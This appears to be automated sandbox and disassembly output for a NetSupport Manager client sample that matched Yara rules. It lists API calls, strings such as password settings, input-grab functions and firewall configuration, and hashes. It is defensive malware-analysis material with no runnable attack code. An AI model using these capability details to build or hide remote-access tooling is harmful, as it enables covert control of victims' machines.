                                                                                        • String ID: Add [%s]%s=%s$Chg [%s]%s=%s$Client$Del [%s]%s=%s$Info. Lockup averted for AD policy changes$Info. Policy changed - re-initui$Info. Policy changed - reload transports...$IsA()$NSA.LIC$NSM.LIC$RoomSpec$TracePolicyChange$Warning. Can't calc AD policy changes$_debug$client$client.$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h
                                                                                        • API String ID: 3535843008-2062829784
                                                                                        • Opcode ID: 027c4974fe4e47a31e6b1b92b845a70a180c4de8d1209735ca177a368e2ea53b
                                                                                        • Instruction ID: 6553b1da6d6d14651d2a1fffef45e08f8fb4271012d2e4188a9b1e9169dedbc2
                                                                                        • Opcode Fuzzy Hash: 027c4974fe4e47a31e6b1b92b845a70a180c4de8d1209735ca177a368e2ea53b
                                                                                        • Instruction Fuzzy Hash: E4420778E002999FEB21CBA0CD90FEEF7766F95B08F1401D8D50967681EB727A84CB51

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                          • Part of subcall function 1110F420: _malloc.LIBCMT ref: 1110F439
                                                                                          • Part of subcall function 1110F420: wsprintfA.USER32 ref: 1110F454
                                                                                          • Part of subcall function 1110F420: _memset.LIBCMT ref: 1110F477
                                                                                        • InitializeCriticalSection.KERNEL32(0000000C,?,00000000), ref: 11074AE5
                                                                                        • InitializeCriticalSection.KERNEL32(00000024,?,00000000), ref: 11074AEB
                                                                                        • InitializeCriticalSection.KERNEL32(0000003C,?,00000000), ref: 11074AF1
                                                                                        • InitializeCriticalSection.KERNEL32(0000DB1C,?,00000000), ref: 11074AFA
                                                                                        • InitializeCriticalSection.KERNEL32(00000054,?,00000000), ref: 11074B00
                                                                                        • InitializeCriticalSection.KERNEL32(0000006C,?,00000000), ref: 11074B06
                                                                                        • _strncpy.LIBCMT ref: 11074B68
                                                                                        • ExpandEnvironmentStringsA.KERNEL32(?,?,00000100,?,?,?,?,?,?,00000000), ref: 11074BCF
                                                                                        • CreateThread.KERNEL32(00000000,00004000,11070C60,00000000,00000000,?), ref: 11074C6C
                                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,00000000), ref: 11074C73
                                                                                        • SetTimer.USER32(00000000,00000000,000000FA,11063680), ref: 11074CB7
                                                                                        • std::exception::exception.LIBCMT ref: 11074D68
                                                                                        • __CxxThrowException@8.LIBCMT ref: 11074D83
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.4132521378.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_11000000_shv.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CriticalInitializeSection$CloseCreateEnvironmentException@8ExpandHandleStringsThreadThrowTimer_malloc_memset_strncpystd::exception::exceptionwsprintf
                                                                                        • String ID: ..\ctl32\Connect.cpp$DefaultUsername$General$Password$RememberPassword$destroy_queue == NULL
                                                                                        • API String ID: 703120326-1497550179
                                                                                        • Opcode ID: 7c8943816f378bc6fd854347406ceee894156ad89ebdfca9a8c75f1e5f5be459
                                                                                        • Instruction ID: 2d3153b5a6430d98d64e81d2a1e668bfe4de0d121a1dff3557e595bbadcf65c6
                                                                                        • Opcode Fuzzy Hash: 7c8943816f378bc6fd854347406ceee894156ad89ebdfca9a8c75f1e5f5be459
                                                                                        • Instruction Fuzzy Hash: 79B1A4B5A00359AFD710CF64CD84FDAF7F4BB48708F0085A9E65997281EBB0B944CB65

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                          • Part of subcall function 1110F420: _malloc.LIBCMT ref: 1110F439
                                                                                          • Part of subcall function 1110F420: wsprintfA.USER32 ref: 1110F454
                                                                                          • Part of subcall function 1110F420: _memset.LIBCMT ref: 1110F477
                                                                                        • OpenEventA.KERNEL32(00000002,00000000,nsm_gina_sas,00000009), ref: 11108E0A
                                                                                        • CloseHandle.KERNEL32(00000000), ref: 11108E19
                                                                                        • GetSystemDirectoryA.KERNEL32(?,000000F7), ref: 11108E2B
                                                                                        • LoadLibraryA.KERNEL32(?), ref: 11108E61
                                                                                        • GetProcAddress.KERNEL32(?,GrabKM), ref: 11108E8E
                                                                                        • GetProcAddress.KERNEL32(?,LoggedOn), ref: 11108EA6
                                                                                        • FreeLibrary.KERNEL32(?), ref: 11108ECB
                                                                                          • Part of subcall function 1110F2B0: CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00000000,76EEC3F0,00000000,?,11110245,1110FDE0,00000001,00000000), ref: 1110F2C7
                                                                                          • Part of subcall function 1110F2B0: CreateThread.KERNEL32(00000000,11110245,00000001,00000000,00000000,0000000C), ref: 1110F2EA
                                                                                          • Part of subcall function 1110F2B0: WaitForSingleObject.KERNEL32(?,000000FF,?,11110245,1110FDE0,00000001,00000000,?,?,?,?,?,11031040), ref: 1110F317
                                                                                          • Part of subcall function 1110F2B0: CloseHandle.KERNEL32(?,?,11110245,1110FDE0,00000001,00000000,?,?,?,?,?,11031040), ref: 1110F321
                                                                                        • GetStockObject.GDI32(0000000D), ref: 11108EDF
                                                                                        • GetObjectA.GDI32(00000000,0000003C,?), ref: 11108EEF
                                                                                        • InitializeCriticalSection.KERNEL32(0000003C), ref: 11108F0B
                                                                                        • InitializeCriticalSection.KERNEL32(111F060C), ref: 11108F16
                                                                                          • Part of subcall function 11107290: LoadLibraryA.KERNEL32(Wtsapi32.dll,00000000,00000000,11189A56,000000FF), ref: 11107363
                                                                                          • Part of subcall function 11107290: LoadLibraryA.KERNEL32(Advapi32.dll), ref: 111073B2
                                                                                        • CloseHandle.KERNEL32(00000000,Function_00102C50,00000001,00000000), ref: 11108F59
                                                                                          • Part of subcall function 1109E9E0: GetCurrentProcess.KERNEL32(00020008,00000000,?,?,110F7D14,00000001,111417B8,_debug,TraceCopyData,00000000,00000000,?,?,00000000,00000000), ref: 1109EA01
                                                                                          • Part of subcall function 1109E9E0: OpenProcessToken.ADVAPI32(00000000,?,?,110F7D14,00000001,111417B8,_debug,TraceCopyData,00000000,00000000,?,?,00000000,00000000), ref: 1109EA08
                                                                                          • Part of subcall function 1109E9E0: CloseHandle.KERNEL32(00000000,00000000,?,?,00000000,00000000), ref: 1109EA27
                                                                                        • CloseHandle.KERNEL32(00000000,Function_00102C50,00000001,00000000), ref: 11108FAA
                                                                                        • CloseHandle.KERNEL32(00000000,Function_00102C50,00000001,00000000), ref: 11108FFF
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.4132521378.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_11000000_shv.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CloseHandle$Library$LoadObject$AddressCreateCriticalEventInitializeOpenProcProcessSection$CurrentDirectoryFreeSingleStockSystemThreadTokenWait_malloc_memsetwsprintf
                                                                                        • String ID: GrabKM$LPT1$LoggedOn$\pcigina$nsm_gina_sas
                                                                                        • API String ID: 3930710499-403456261
                                                                                        • Opcode ID: 1bb63630e84e06d7a5d883501c08249baca6a639cf459e52fb6089e18ee58e4a
                                                                                        • Instruction ID: 229803012459fbbe5cfd3a30b02a894d1af5bad55287ed163187595495ff030c
                                                                                        • Opcode Fuzzy Hash: 1bb63630e84e06d7a5d883501c08249baca6a639cf459e52fb6089e18ee58e4a
                                                                                        • Instruction Fuzzy Hash: DC81AFB4E0435AEFEB55DFB48C89B9AFBE9AB48308F00457DE569D7280E7309944CB11

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                          • Part of subcall function 111450A0: GetVersionExA.KERNEL32(111F0EF0,75BF8400), ref: 111450D0
                                                                                          • Part of subcall function 111450A0: RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00000001,?), ref: 1114510F
                                                                                          • Part of subcall function 111450A0: _memset.LIBCMT ref: 1114512D
                                                                                          • Part of subcall function 111450A0: _strncpy.LIBCMT ref: 111451FA
                                                                                        • PostMessageA.USER32(0002043C,000006CF,00000007,00000000), ref: 11138E0F
                                                                                          • Part of subcall function 1105DD10: __wcstoi64.LIBCMT ref: 1105DD4D
                                                                                        • SetWindowTextA.USER32(0002043C,00000000), ref: 11138EB7
                                                                                        • IsWindowVisible.USER32(0002043C), ref: 11138F7C
                                                                                        • GetForegroundWindow.USER32(?,?,?,?,?,?,?,?,00000000), ref: 11138F9C
                                                                                        • IsWindowVisible.USER32(0002043C), ref: 11138FAA
                                                                                        • SetForegroundWindow.USER32(00000000), ref: 11138FD8
                                                                                        • EnableWindow.USER32(0002043C,00000001), ref: 11138FE7
                                                                                        • IsWindowVisible.USER32(0002043C), ref: 11139038
                                                                                        • IsWindowVisible.USER32(0002043C), ref: 11139045
                                                                                        • EnableWindow.USER32(0002043C,00000000), ref: 11139059
                                                                                        • EnableWindow.USER32(0002043C,00000000), ref: 11138FBF
                                                                                          • Part of subcall function 11131210: ShowWindow.USER32(0002043C,00000000,?,11139062,00000007,?,?,?,?,?,00000000), ref: 11131234
                                                                                        • EnableWindow.USER32(0002043C,00000001), ref: 1113906D
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.4132521378.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_11000000_shv.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Window$EnableVisible$Foreground$MessageOpenPostShowTextVersion__wcstoi64_memset_strncpy
                                                                                        • String ID: Client$ConnectedText$HideWhenIdle$LockedText$ShowUIOnConnect$ViewedText
                                                                                        • API String ID: 3453649892-3803836183
                                                                                        • Opcode ID: 391fd03a16533da79435ce5bee1303fc2e717428408a6b437c143b59ca9afbf1
                                                                                        • Instruction ID: ae8ec3c714d324370739ddb1cab1952d607c59122f5be0bb7ac7fd02d25128b2
                                                                                        • Opcode Fuzzy Hash: 391fd03a16533da79435ce5bee1303fc2e717428408a6b437c143b59ca9afbf1
                                                                                        • Instruction Fuzzy Hash: 86C12A75A1122A9BEB11DFF4CD80B6EF769ABC072DF140138EA159B28CEB75E804C751
                                                                                        APIs
                                                                                        • GetModuleFileNameA.KERNEL32(00000000,?,00000102,NSM.LIC,00000009), ref: 110281F1
                                                                                          • Part of subcall function 11081B40: _strrchr.LIBCMT ref: 11081B4E
                                                                                        • wsprintfA.USER32 ref: 11028214
                                                                                        • WaitForSingleObject.KERNEL32(?,000000FF), ref: 11028259
                                                                                        • GetExitCodeProcess.KERNEL32(?,?), ref: 1102826D
                                                                                        • wsprintfA.USER32 ref: 11028291
                                                                                        • CloseHandle.KERNEL32(?), ref: 110282A7
                                                                                        • CloseHandle.KERNEL32(?), ref: 110282B0
                                                                                        • LoadLibraryExA.KERNEL32(?,00000000,00000002,?,?,?,?,?,NSM.LIC,00000009), ref: 11028311
                                                                                        • GetModuleHandleA.KERNEL32(00000000,00000000,?,?,?,?,?,NSM.LIC,00000009), ref: 11028325
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.4132521378.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000005.00000002.4132504761.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000005.00000002.4132635171.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000005.00000002.4132682432.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000005.00000002.4132703581.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000005.00000002.4132721727.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000005.00000002.4132721727.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000005.00000002.4132721727.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000005.00000002.4132721727.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        • Associated: 00000005.00000002.4132721727.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_11000000_shv.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Handle$CloseModulewsprintf$CodeExitFileLibraryLoadNameObjectProcessSingleWait_strrchr
                                                                                        • String ID: "$Locales\%d\$NSM.LIC$SetClientResLang called, gPlatform %x$Setting resource langid=%d$\GetUserLang.exe"$pcicl32_res.dll
                                                                                        • API String ID: 512045693-419896573
                                                                                        • Opcode ID: be2a4d539e06a764388bcf1fddbdd407ba59922a3a30c161602edf8e7ebb4000
                                                                                        • Instruction ID: 7a246749baaa4a6e23861a3fd22e5cd13303056935123195fcb9bb693944541c
                                                                                        • Opcode Fuzzy Hash: be2a4d539e06a764388bcf1fddbdd407ba59922a3a30c161602edf8e7ebb4000
                                                                                        • Instruction Fuzzy Hash: B841D678E04229ABD714CF65CCD5FEAB7B9EB44709F0081A5F95897280DA71AE44CBA0
                                                                                        APIs
                                                                                        • LoadLibraryA.KERNEL32(PCIINV.DLL,1B492F88,02E180C8,02E180B8,?,00000000,1118276C,000000FF,?,11031942,02E180C8,00000000,?,?,?), ref: 11085E45
                                                                                          • Part of subcall function 1110F420: _malloc.LIBCMT ref: 1110F439
                                                                                          • Part of subcall function 1110F420: wsprintfA.USER32 ref: 1110F454
                                                                                          • Part of subcall function 1110F420: _memset.LIBCMT ref: 1110F477
                                                                                          • Part of subcall function 1110F520: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,76EEC3F0,?,1111022D,00000000,00000001,?,?,?,?,?,11031040), ref: 1110F53E
                                                                                        • GetProcAddress.KERNEL32(00000000,GetInventory), ref: 11085E6B
                                                                                        • GetProcAddress.KERNEL32(00000000,Cancel), ref: 11085E7F
                                                                                        • GetProcAddress.KERNEL32(00000000,GetInventoryEx), ref: 11085E93
                                                                                        • wsprintfA.USER32 ref: 11085F1B
                                                                                        • wsprintfA.USER32 ref: 11085F32
                                                                                        • wsprintfA.USER32 ref: 11085F49
                                                                                        • CloseHandle.KERNEL32(00000000,11085C70,00000001,00000000), ref: 1108609A
                                                                                          • Part of subcall function 11085A80: CloseHandle.KERNEL32(?,74DEF550,?,?,110860C0,?,11031942,02E180C8,00000000,?,?,?), ref: 11085A98
                                                                                          • Part of subcall function 11085A80: CloseHandle.KERNEL32(?,74DEF550,?,?,110860C0,?,11031942,02E180C8,00000000,?,?,?), ref: 11085AAB
                                                                                          • Part of subcall function 11085A80: CloseHandle.KERNEL32(?,74DEF550,?,?,110860C0,?,11031942,02E180C8,00000000,?,?,?), ref: 11085ABE
                                                                                          • Part of subcall function 11085A80: FreeLibrary.KERNEL32(00000000,74DEF550,?,?,110860C0,?,11031942,02E180C8,00000000,?,?,?), ref: 11085AD1
                                                                                        Strings
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CloseHandlewsprintf$AddressProc$Library$CreateEventFreeLoad_malloc_memset
                                                                                        • String ID: %s_HF.%s$%s_HW.%s$%s_SW.%s$Cancel$GetInventory$GetInventoryEx$PCIINV.DLL
                                                                                        • API String ID: 4263811268-2492245516
                                                                                        • Opcode ID: f5aef0daa14bc6ea66726438fc532167d4c8a127bd90decb683372eff0d319c6
                                                                                        • Instruction ID: c264ff3baa83c9e34b1ea5f373b83d9ca187d225ad452563e08076ac2ec7b834
                                                                                        • Opcode Fuzzy Hash: f5aef0daa14bc6ea66726438fc532167d4c8a127bd90decb683372eff0d319c6
                                                                                        • Instruction Fuzzy Hash: 40718175E0874AABEB14CF75CC46BDBFBE4AB48304F10452AE956D7280EB71A500CB95
                                                                                        APIs
                                                                                        • OpenMutexA.KERNEL32(001F0001,00000000,PCIMutex), ref: 110305F3
                                                                                        • CreateMutexA.KERNEL32(00000000,00000000,PCIMutex), ref: 1103060A
                                                                                        • GetProcAddress.KERNEL32(?,SetProcessDPIAware), ref: 110306AC
                                                                                        • SetLastError.KERNEL32(00000078), ref: 110306C2
                                                                                        • WaitForSingleObject.KERNEL32(?,000001F4), ref: 110306FC
                                                                                        • CloseHandle.KERNEL32(?), ref: 11030709
                                                                                        • FreeLibrary.KERNEL32(?), ref: 11030714
                                                                                        • CloseHandle.KERNEL32(00000000), ref: 1103071B
                                                                                        Strings
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CloseHandleMutex$AddressCreateErrorFreeLastLibraryObjectOpenProcSingleWait
                                                                                        • String ID: /247$PCIMutex$SOFTWARE\Policies\NetSupport\Client\standard$SetProcessDPIAware$_debug\trace$_debug\tracefile$istaUI
                                                                                        • API String ID: 2061479752-1320826866
                                                                                        • Opcode ID: 344344da4f24c17c6c11c64113ed1526ed618b4690303f5ba055bceda43c688d
                                                                                        • Instruction ID: 4511418fabb8e143c6e2e60e2068ec6a59f08b67eb8208c825473cc9362a61df
                                                                                        • Opcode Fuzzy Hash: 344344da4f24c17c6c11c64113ed1526ed618b4690303f5ba055bceda43c688d
                                                                                        • Instruction Fuzzy Hash: 72613774E1635AAFEB10DFB09C44B9EB7B4AF8470DF1000A9D919A71C5EF70AA44CB51
                                                                                        APIs
                                                                                          • Part of subcall function 1110F340: SetEvent.KERNEL32(00000000,?,1102C44F), ref: 1110F364
                                                                                        • WaitForSingleObject.KERNEL32(?,000000FF), ref: 1102C455
                                                                                        • GetTickCount.KERNEL32 ref: 1102C47A
                                                                                          • Part of subcall function 110D0710: __strdup.LIBCMT ref: 110D072A
                                                                                        • GetTickCount.KERNEL32 ref: 1102C574
                                                                                          • Part of subcall function 110D1370: wvsprintfA.USER32(?,?,1102C511), ref: 110D139B
                                                                                          • Part of subcall function 110D07C0: _free.LIBCMT ref: 110D07ED
                                                                                        • WaitForSingleObject.KERNEL32(?,000000FF), ref: 1102C66C
                                                                                        • CloseHandle.KERNEL32(?), ref: 1102C688
                                                                                        Strings
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CountObjectSingleTickWait$CloseEventHandle__strdup_freewvsprintf
                                                                                        • String ID: ?IP=%s$GeoIP$GetLatLong=%s, took %d ms$IsA()$LatLong$_debug$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h$http://geo.netsupportsoftware.com/location/loca.asp
                                                                                        • API String ID: 596640303-1725438197
                                                                                        • Opcode ID: 609e97f705776535a990b82a8e5f18e172a35da44f01400c4fa73658ea828b55
                                                                                        • Instruction ID: 59613557395ae23f7967247d4baf4cae7550bfc3229e85cd4bc92fe2e2f2b4a8
                                                                                        • Opcode Fuzzy Hash: 609e97f705776535a990b82a8e5f18e172a35da44f01400c4fa73658ea828b55
                                                                                        • Instruction Fuzzy Hash: 6B818275E0020AABDF04DBE8CD94FEEF7B5AF59708F504258E82567284DB34BA05CB61
                                                                                        APIs
                                                                                        • RegOpenKeyExA.KERNEL32(80000002,Software\Policies\NetSupport\Client,00000000,00020019,?,00000000,?,?), ref: 1106175A
                                                                                          • Part of subcall function 11061140: RegOpenKeyExA.ADVAPI32(00000003,?,00000000,00020019,?,?), ref: 1106117C
                                                                                          • Part of subcall function 11061140: RegEnumValueA.ADVAPI32(?,00000000,?,?,00000000,?,?,?,?,00000000), ref: 110611D4
                                                                                        • RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 110617AB
                                                                                        • RegEnumKeyExA.ADVAPI32(?,00000001,?,00000100,00000000,00000000,00000000,00000000), ref: 11061865
                                                                                        • RegCloseKey.ADVAPI32(?), ref: 11061881
                                                                                        Strings
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Enum$Open$CloseValue
                                                                                        • String ID: %s\%s\%s\$Client$Client$Client.%04d.%s$DisableUserPolicies$Software\Policies\NetSupport$Software\Policies\NetSupport\Client$Software\Policies\NetSupport\Client\Standard$Standard
                                                                                        • API String ID: 2823542970-1528906934
                                                                                        • Opcode ID: 4cf0c36994a383612a719e249f3f276c0f36ade9332230c7c569e8670290d878
                                                                                        • Instruction ID: 3a074a016260bf88f68c0586b8c591cabbb012c9b5ad66670ab8b6bf40d046b4
                                                                                        • Opcode Fuzzy Hash: 4cf0c36994a383612a719e249f3f276c0f36ade9332230c7c569e8670290d878
                                                                                        • Instruction Fuzzy Hash: 5F416179E4022DABD724CB55CC81FEAB7BCEB94748F1001D9EA48A6140D6B06E84CFA1
                                                                                        APIs
                                                                                          • Part of subcall function 1105DD10: __wcstoi64.LIBCMT ref: 1105DD4D
                                                                                        • GetTickCount.KERNEL32 ref: 11137692
                                                                                          • Part of subcall function 11096970: CoInitialize.OLE32(00000000), ref: 11096984
                                                                                          • Part of subcall function 11096970: CLSIDFromProgID.COMBASE(HNetCfg.FwMgr,?,?,?,?,?,?,?,1113769B), ref: 1109699E
                                                                                          • Part of subcall function 11096970: CoCreateInstance.OLE32(?,00000000,00000001,111C08AC,?,?,?,?,?,?,?,1113769B), ref: 110969BB
                                                                                          • Part of subcall function 11096970: CoUninitialize.OLE32(?,?,?,?,?,?,1113769B), ref: 110969D9
                                                                                        • GetTickCount.KERNEL32 ref: 111376A1
                                                                                        • _memset.LIBCMT ref: 111376E3
                                                                                        • GetModuleFileNameA.KERNEL32(00000000,?,00000105), ref: 111376F9
                                                                                        • _strrchr.LIBCMT ref: 11137708
                                                                                        • _free.LIBCMT ref: 1113775A
                                                                                        Strings
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CountTick$CreateFileFromInitializeInstanceModuleNameProgUninitialize__wcstoi64_free_memset_strrchr
                                                                                        • String ID: *AutoICFConfig$Client$ICFConfig$ICFConfig2 returned 0x%x$IsICFPresent() took %d ms$IsICFPresent...$No ICF present
                                                                                        • API String ID: 711243594-1270230032
                                                                                        • Opcode ID: 4f0f92e27c35dbd641ed9010d5cad7dccc431a8d4141c0f1938ec124a93e63f3
                                                                                        • Instruction ID: 94b21c48fabd249aebac1ca0d473d12a11480cc4bb4ab1ee9f0f9b3b40903c19
                                                                                        • Opcode Fuzzy Hash: 4f0f92e27c35dbd641ed9010d5cad7dccc431a8d4141c0f1938ec124a93e63f3
                                                                                        • Instruction Fuzzy Hash: 9941AE7AE0022E97C710DF756C89BEFF7699B5471DF040079E90493140EAB1AD44CBE1
                                                                                        APIs
                                                                                          • Part of subcall function 11145440: _memset.LIBCMT ref: 11145485
                                                                                          • Part of subcall function 11145440: GetVersionExA.KERNEL32(?,00000000,00000000), ref: 1114549E
                                                                                          • Part of subcall function 11145440: LoadLibraryA.KERNEL32(kernel32.dll), ref: 111454C5
                                                                                          • Part of subcall function 11145440: GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 111454D7
                                                                                          • Part of subcall function 11145440: FreeLibrary.KERNEL32(00000000), ref: 111454EF
                                                                                          • Part of subcall function 11145440: GetSystemDefaultLangID.KERNEL32 ref: 111454FA
                                                                                        • AdjustWindowRectEx.USER32(111417B8,00CE0000,00000001,00000001), ref: 11133EC7
                                                                                        • LoadMenuA.USER32(00000000,000003EC), ref: 11133ED8
                                                                                        • GetSystemMetrics.USER32(00000021), ref: 11133EE9
                                                                                        • GetSystemMetrics.USER32(0000000F), ref: 11133EF1
                                                                                        • GetSystemMetrics.USER32(00000004), ref: 11133EF7
                                                                                        • GetDC.USER32(00000000), ref: 11133F03
                                                                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 11133F0E
                                                                                        • ReleaseDC.USER32(00000000,00000000), ref: 11133F1A
                                                                                        • CreateWindowExA.USER32(00000001,NSMWClass,02E00138,00CE0000,80000000,80000000,111417B8,?,00000000,?,11000000,00000000), ref: 11133F6F
                                                                                        • GetLastError.KERNEL32(?,?,?,?,?,110F7D09,00000001,111417B8,_debug), ref: 11133F77
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.4132521378.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                         • Associated: 00000005.00000002.4132504761.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                         • Associated: 00000005.00000002.4132635171.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
                                                                                         • Associated: 00000005.00000002.4132682432.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
                                                                                         • Associated: 00000005.00000002.4132703581.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                         • Associated: 00000005.00000002.4132721727.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
                                                                                         • Associated: 00000005.00000002.4132721727.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
                                                                                         • Associated: 00000005.00000002.4132721727.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
                                                                                         • Associated: 00000005.00000002.4132721727.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                         • Associated: 00000005.00000002.4132721727.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
                                                                                         • Associated: 00000005.00000002.4132721727.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                         • Associated: 00000005.00000002.4132721727.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
                                                                                         • Associated: 00000005.00000002.4132721727.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_11000000_shv.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: System$Metrics$LibraryLoadWindow$AddressAdjustCapsCreateDefaultDeviceErrorFreeLangLastMenuProcRectReleaseVersion_memset
                                                                                        • String ID: CreateMainWnd, hwnd=%x, e=%d$NSMWClass$mainwnd ht1=%d, ht2=%d, yppi=%d
                                                                                        • API String ID: 1594747848-1114959992
                                                                                        • Opcode ID: 75f297c2efb98d08cbe097e8d34710f0383f1ebd178d5accfa4770b5d5071ee0
                                                                                        • Instruction ID: 5297cf036ba1cbd73fc44df567c8a611b910eb11675e7325f2afb4d5e36916b9
                                                                                        • Opcode Fuzzy Hash: 75f297c2efb98d08cbe097e8d34710f0383f1ebd178d5accfa4770b5d5071ee0
                                                                                        • Instruction Fuzzy Hash: C4316275E10219ABDB149FF58C85FAFFBB8EB48709F100529FA25B7284D67469008BA4
                                                                                        APIs
                                                                                        • OpenSCManagerA.ADVAPI32(00000000,00000000,000F003F,?,00000000,19141918,1102DD98,00000000,1B492F88,?,00000000,00000000), ref: 1102CE44
                                                                                        • OpenServiceA.ADVAPI32(00000000,ProtectedStorage,00000004), ref: 1102CE5A
                                                                                        • QueryServiceStatus.ADVAPI32(00000000,?), ref: 1102CE6E
                                                                                        • CloseServiceHandle.ADVAPI32(00000000), ref: 1102CE75
                                                                                        • Sleep.KERNEL32(00000032), ref: 1102CE86
                                                                                        • CloseServiceHandle.ADVAPI32(00000000), ref: 1102CE96
                                                                                        • Sleep.KERNEL32(000003E8), ref: 1102CEE2
                                                                                        • CloseHandle.KERNEL32(?), ref: 1102CF0F
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.4132521378.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                         • Associated: 00000005.00000002.4132504761.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                         • Associated: 00000005.00000002.4132635171.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
                                                                                         • Associated: 00000005.00000002.4132682432.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
                                                                                         • Associated: 00000005.00000002.4132703581.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                         • Associated: 00000005.00000002.4132721727.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
                                                                                         • Associated: 00000005.00000002.4132721727.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
                                                                                         • Associated: 00000005.00000002.4132721727.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
                                                                                         • Associated: 00000005.00000002.4132721727.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                         • Associated: 00000005.00000002.4132721727.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
                                                                                         • Associated: 00000005.00000002.4132721727.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                         • Associated: 00000005.00000002.4132721727.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
                                                                                         • Associated: 00000005.00000002.4132721727.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_11000000_shv.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Service$CloseHandle$OpenSleep$ManagerQueryStatus
                                                                                        • String ID: >$NSA.LIC$NSM.LIC$ProtectedStorage
                                                                                        • API String ID: 83693535-2077998243
                                                                                        • Opcode ID: 8822f1513d5873ee506041ece4c3caa14d779e6eafa0361d2a69553500dbb03f
                                                                                        • Instruction ID: 880dc79335238c7f7dd8ff78cda89552a6d5dde84d0873ba54ec41c4173cff75
                                                                                        • Opcode Fuzzy Hash: 8822f1513d5873ee506041ece4c3caa14d779e6eafa0361d2a69553500dbb03f
